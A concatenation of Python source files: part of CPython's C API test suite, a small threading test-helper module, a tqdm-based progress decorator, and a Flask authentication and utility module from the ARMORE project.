self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned a result '
br'with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = err.replace(b'\r', b'').decode('ascii', 'replace')
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
def test_fatal_error(self):
expected = ('_testcapi',)
not_expected = ('sys', 'builtins', '_imp', '_thread', '_weakref',
'_io', 'marshal', '_signal', '_abc')
code = 'import _testcapi; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import threading
import sys
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
def isScalar(x):
return not isinstance(x, (list, tuple))
def isList(x):
return isinstance(x, (list))
def asString(x):
return str(x)
def makeDict():
return {'a': 1.0, 'c': 3.0, 'b': 2.0}
def makeTuple():
return (1.0, 2.0, 3.0)
def makeIterator(x):
return iter(x)
def makeGenerator(n):
i = 0
while i < n:
yield i
i += 1
def iterateOnThread(iter):
results = []
def iteration_worker():
for i in iter:
results.append(i)
thread = threading.Thread(target = iteration_worker)
thread.start()
while thread.isAlive():
thread.join(0.1)
return results
def invokeOnThread(f, *args, **kwargs):
result = []
def invoke_worker():
result.append(f(*args, **kwargs))
thread = threading.Thread(target = invoke_worker)
thread.start()
while thread.isAlive():
thread.join(0.1)
return result[0]
def reflect(x):
return x
def callFunc(f, *args, **kwargs):
return f(*args, **kwargs)
def testThrowError():
throwError()
def throwError():
raise ValueError('A very specific bad thing happened')
class PythonClass(object):
FOO = 1
BAR = 2
@classmethod
def class_method(cls):
return cls.FOO
class PythonCallable(object):
FOO = 1
BAR = 2
""" Call a callable
Args:
arg1: First argument.
"""
def __call__(self, arg1):
return arg1
def create_callable():
return PythonCallable()
dict_with_callable = dict(callable = create_callable())
|
asyncprogressor.py
|
#!/usr/bin/env python3
from tqdm import tqdm
import threading, time
import diskcache as dc
from datetime import datetime
done = False
def go_progress(seconds):
global done
with tqdm(total=400, bar_format = "{l_bar}{bar}") as pbar:
for i in range(0, 401):
time.sleep(seconds * 0.0025)
if done:
break
if i < 396:
pbar.update(1)
pbar.update(400 - i - 1)
time.sleep(1)
def common(whole_key, func, *args, **kwargs):
global done
done = False
cache = dc.Cache('/tmp/ywrnvgotba/') #random
try:
(seconds, times) = cache[whole_key]
if seconds > 1:
p = threading.Thread(target=go_progress, args=((int(seconds / times)),))
p.start()
except:
(seconds, times) = (0, 0)
start = datetime.now()
func(*args, **kwargs)
end = datetime.now()
done = True
seconds += (end - start).seconds
times += 1
cache[whole_key] = (seconds, times)
def progressor(func):
def wrapper(*args, **kwargs):
whole_key = func.__name__
common(whole_key, func, *args, **kwargs)
return wrapper
@progressor
def long_function(s):
time.sleep(s)
if __name__ == "__main__":
long_function(3)
|
common.py
|
# # # # #
# common.py
#
# Contains methods used across
# multiple backend files
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
from datetime import datetime
from subprocess import check_output
import json
import threading
import os
import re
from flask_httpauth import HTTPDigestAuth
from functools import wraps
import domains.support.models as modLib
from flask import session, request, flash, redirect, url_for, Response
auth = HTTPDigestAuth(realm="ARMORE", use_ha1_pw=True)
defaultCreds = { "armore": auth.generate_ha1("armore", "armore") }
@auth.error_handler
def secureError():
return Response('<script> window.location.replace("/welcome")</script>', 401, {'WWWAuthenticate':'Digest realm="Login Required"'})
def notAuthorized():
flash("Not Authorized to View This Page")
if not request.referrer:
return redirect(url_for('.welcome'))
return redirect(request.referrer)
# Decorator for determining if user is authenticated and authorized to view resource
# If 'roles' is a string, resource requires AT LEAST the specified level of authorization
# if 'roles' is an array of strings, resource requires ANY of the specified levels of authorization
def secure(roles):
def wrapper(f):
@wraps(f)
@auth.login_required
def wrapped(*args, **kwargs):
if modLib.isInitialSetup():
return redirect("/admin/initialUserSetup")
if 'username' not in session:
session['username'] = auth.username()
session['role'] = modLib.getRole(session['username'])
if type(roles) is list:
if session['role'] not in roles:
return notAuthorized()
elif type(roles) is str:
if modLib.getRoleValue(session['role']) > modLib.getRoleValue(roles):
return notAuthorized()
else:
print("#### ERROR: 'roles' NOT A VALID TYPE ####")
return secureError()
return f(*args, **kwargs)
return wrapped
return wrapper
# Gets password from Users database. Defines function for flask-httpauth
@auth.get_password
def getPw(theUsername):
try:
if not modLib.isInitialSetup():
user = modLib.Users.query.filter_by(username = theUsername).all()
if len(user) > 0:
return user[0].pwdhash.decode('utf-8')
if modLib.isInitialSetup():
if theUsername in defaultCreds:
return defaultCreds.get(theUsername)
else:
if theUsername in getUsernames():
return userCreds.get(theUsername)
except:
None
return None
# Flash is how Flask displays error messages to the user. These are helper functions for that
def clearFlash():
if 'flash' in session:
del session['flash']
def addToFlash(err):
if err != "":
if 'flash' in session:
session['flash'] += err + "\n"
else:
session['flash'] = err
def getCurrentTimestampAsStr():
return str(datetime.now())
def getTemplateAsString(pathToTemplate):
with open(pathToTemplate, "r") as temp:
tString = temp.read()
return tString
def getPocPhoneNumber():
return "(555) 123-4567 (Test Number Only)"
def getLocation():
return "Olympus Mons (Test Location Only)"
def getDescription():
return "Winter getaway, snowfall rare (Test Description Only)"
def getJsonStrUnformatted(inputDict):
return json.loads(json.JSONEncoder().encode(inputDict))
def getJsonStrFormatted(inputDict):
return json.dumps(getJsonStrUnformatted(inputDict), sort_keys=True, indent=4)
def monToNum(mon):
return {
'Jan': 1,
'Feb': 2,
'Mar': 3,
'Apr': 4,
'May': 5,
'Jun': 6,
'Jul': 7,
'Aug': 8,
'Sep': 9,
'Oct': 10,
'Nov': 11,
'Dec': 12,
}[mon]
def toTimestamp(mon, day, hh, mm, ss, year=None):
today = datetime.today()
if year == None:
year = today.year
if mon > today.month:
year -= 1
return datetime(year, mon, day, hh, mm, ss).timestamp()
# Runs system commands
def cmd(command, isShell=False):
if type(command) is list:
return check_output(command, shell=isShell).decode('utf-8')
else:
return check_output(command.split(' '), shell=isShell).decode('utf-8')
def timestampToPrettyDate(timestamp):
return datetime.fromtimestamp(timestamp).strftime('%Y/%m/%d %H:%M:%S')
def getFileType(theFile):
return cmd('file ' + theFile).split(': ')[1]
def startNewThread(method, args=()):
t = threading.Thread(target=method, args=args)
t.start()
def getKeysByValue(inpDict, value):
return [k for k,v in inpDict.items() if v == value]
